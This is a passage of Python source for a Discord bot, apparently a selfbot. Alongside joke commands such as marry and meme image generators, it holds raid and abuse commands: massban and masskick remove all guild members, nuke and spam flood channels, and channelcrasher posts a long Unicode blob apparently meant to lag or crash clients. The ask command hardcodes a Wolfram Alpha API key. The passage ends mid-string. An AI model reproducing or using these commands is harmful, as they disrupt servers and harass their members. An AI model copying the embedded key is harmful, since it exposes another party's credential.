delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', UNKNOWN".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) marriedlist = "no one" @bot.command() async def marry(ctx, member: discord.User=None): await ctx.message.delete() if member is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "marry @Flairings", color=errorcolor) embed.set_footer(text=footer) await 
ctx.send(embed=embed, delete_after=deletetimer) else: try: commandprint("Command 'marry' has been used by " + bot.user.name) global marriedlist if f"{member}" in marriedlist: embed=discord.Embed(title=f"You are already married to this person.", color=color) await ctx.send(embed=embed, delete_after=deletetimer) return embed=discord.Embed(title=f"{member} will you marry me?", description="say yes or no", color=color) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', user not found?".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) def check(m): return m.content == "yes" or m.content == "no" and m.channel == ctx.channel msg = await bot.wait_for("message", check=check) if msg.content == "yes": embed=discord.Embed(title=f"{bot.user.name} has married {member}", color=color) await ctx.send(embed=embed, delete_after=deletetimer) marriedlist = f"{msg.author}" else: embed=discord.Embed(title=f"{member} has declined", color=color) await ctx.send(embed=embed, delete_after=deletetimer) @bot.command() async def divorce(ctx): await ctx.message.delete() commandprint("Command 'divorce' has been used by " + bot.user.name) try: global marriedlist embed=discord.Embed(title=f"You have divorced {marriedlist}", color=color) await ctx.send(embed=embed, delete_after=deletetimer) marriedlist = "no one" except Exception as error: errorprint("Exception ' {0} ', user not found?".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def married(ctx): await ctx.message.delete() commandprint("Command 'married' has been used by " + bot.user.name) try: global marriedlist 
embed=discord.Embed(title=f"I am married to", description=f"{marriedlist}", color=color) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', UNKNOWN".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def reverse(ctx, *, text = None): await ctx.message.delete() if text is None: commandprint("Command 'reverse' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "reverse bruh", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) try: commandprint("Command 'reverse' has been used by " + bot.user.name + " with a message of '" + text + "'") await ctx.send(text[::-1]) except Exception as error: errorprint("Exception ' {0} ', Message is too long".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Message is too long \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=['question']) async def ask(ctx, *, question = None): await ctx.message.delete() commandprint("Command 'question' has been used by " + bot.user.name) if question is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a question \n" "Example: " + prefix + "question when did hitler die", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) try: r = requests.get(f"https://api.wolframalpha.com/v1/result?appid=85PTL6-9YEK2RE4HQ&i=" + question + f"%3F").text embed = discord.Embed(title=f" __**{question}?**__ ", description=f"{r}", color=color) 
embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Unknown".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def threats(ctx, image: str = None): await ctx.message.delete() commandprint("Command 'threats' has been used by " + bot.user.name) if image is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a image \n" "Example: " + prefix + "threats https://image.com", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: p = requests.get(f"https://nekobot.xyz/api/imagegen?type=threats&url={image}") embed=discord.Embed(color=color) embed.set_footer(text=footer) embed.set_image(url = p.json()['message']) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid parameters".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid parameters \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def magik(ctx, image: str = None, intensity = None): await ctx.message.delete() commandprint("Command 'magik' has been used by " + bot.user.name) if image is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a image \n" "Example: " + prefix + "magik https://image.com 6", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) try: if intensity is None: p = requests.get(f"https://nekobot.xyz/api/imagegen?type=magik&intensity=10&image={image}") else: p = 
requests.get(f"https://nekobot.xyz/api/imagegen?type=magik&intensity={intensity}&image={image}") embed=discord.Embed(color=color) embed.set_footer(text=footer) embed.set_image(url = p.json()['message']) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid parameters".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid parameters \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def changemymind(ctx, *, text = None): await ctx.message.delete() commandprint("Command 'changemymind' has been used by " + bot.user.name) if text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "changemymind discord shouldnt sell to microsoft", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: p = requests.get(f"https://nekobot.xyz/api/imagegen?type=changemymind&text={text}") embed=discord.Embed(color=color) embed.set_footer(text=footer) embed.set_image(url = p.json()['message']) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid parameters".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid parameters \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def iphonex(ctx, url: str = None): await ctx.message.delete() commandprint("Command 'iphonex' has been used by " + bot.user.name) if url is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a image \n" "Example: " + prefix + "iphonex https://imageinnit.com", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: p 
= requests.get(f"https://nekobot.xyz/api/imagegen?type=iphonex&url={url}") embed=discord.Embed(color=color) embed.set_footer(text=footer) embed.set_image(url = p.json()['message']) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid parameters".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid parameters \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def trumptweet(ctx, *, text = None): await ctx.message.delete() if text is None: commandprint("Command 'trumptweet' has been used by " + bot.user.name + " with no message") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "trumptweet i am declearing war against china", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: commandprint("Command 'trumptweet' has been used by " + bot.user.name + " with a message of '" + text + "'") p = requests.get(f"https://nekobot.xyz/api/imagegen?type=trumptweet&text={text}") embed=discord.Embed(color=color) embed.set_footer(text=footer) embed.set_image(url = p.json()['message']) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Unknown".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() @commands.has_permissions(administrator=True) async def ban(ctx, member : discord.User=None, *, reason = None): await ctx.message.delete() commandprint("Command 'ban' has been used by " + bot.user.name) if member is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a 
member \n" "Example: " + prefix + "ban @Flairings stupid", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) elif reason is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a member \n" "Example: " + prefix + "ban @Flairings stupid", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: await member.ban(reason=reason) embed=discord.Embed(title=f"**{bot.user.name} HAS BANNED {member}**", color=color) await ctx.send(embed=embed, delete_after=deletetimer) embed.set_footer(text=footer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() @commands.has_permissions(administrator=True) async def unban(ctx, member : discord.Member, *, reason): await ctx.message.delete() commandprint("Command 'unban' has been used by " + bot.user.name) if member is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a member \n" "Example: " + prefix + "unban @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: await member.unban(reason=reason) embed=discord.Embed(title=f"**UNBANNED {member}**") embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. 
\n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def massban(ctx): await ctx.message.delete() commandprint("Command 'massban' has been used by " + bot.user.name) try: for user in list(ctx.guild.members): try: await user.ban() except: warningprint("Could not complete 'user.ban'") except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def masskick(ctx): await ctx.message.delete() commandprint("Command 'masskick' has been used by " + bot.user.name) try: for user in list(ctx.guild.members): try: await user.kick() except: print("could not complete task user.kick") except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def massunban(ctx): await ctx.message.delete() commandprint("Command 'massunban' has been used by " + bot.user.name) try: banlist = await ctx.guild.bans() for users in banlist: try: await ctx.guild.unban(user=users.user) except: print("could not complete task guild.unban") except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. 
\n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(pass_context=True) async def banlist(ctx): await ctx.message.delete() commandprint("Command 'banlist' has been used by " + bot.user.name) try: bans = await ctx.guild.bans() em = discord.Embed(title=f'**LIST OF BANNED USERS ({len(bans)})**:', color=color) em.description = ', '.join([str(b.user) for b in bans]) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def nuke(ctx): await ctx.message.delete() commandprint("Command 'nuke' has been used by " + bot.user.name) try: await ctx.send("‎\n" * 500) await ctx.send("‎\n" * 500) await ctx.send("‎\n" * 500) await ctx.send("‎\n" * 500) await ctx.send("‎\n" * 500) await asyncio.sleep(2) except Exception as error: errorprint("Exception ' {0} ', UNKNOWN ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def spam(ctx, amount: int = None, *, text = None): await ctx.message.delete() commandprint("Command 'spam' has been used by " + bot.user.name) if amount is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a amount \n" "Example: " + prefix + "spam 5 hello sir", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) elif text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "spam 
5 hello sir", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: for i in range(amount): try: await ctx.send(text) except Exception as error: errorprint("Exception ' {0} ', UNKNOWN ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def channelcrasher(ctx): await ctx.message.delete() commandprint("Command 'channelcrasher' has been used by " + bot.user.name) try: await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ஝ʴ᠛:partly_sunny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉ
ຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭ⏆ष᳼༊") await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ஝ʴ᠛:partly_sunny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊
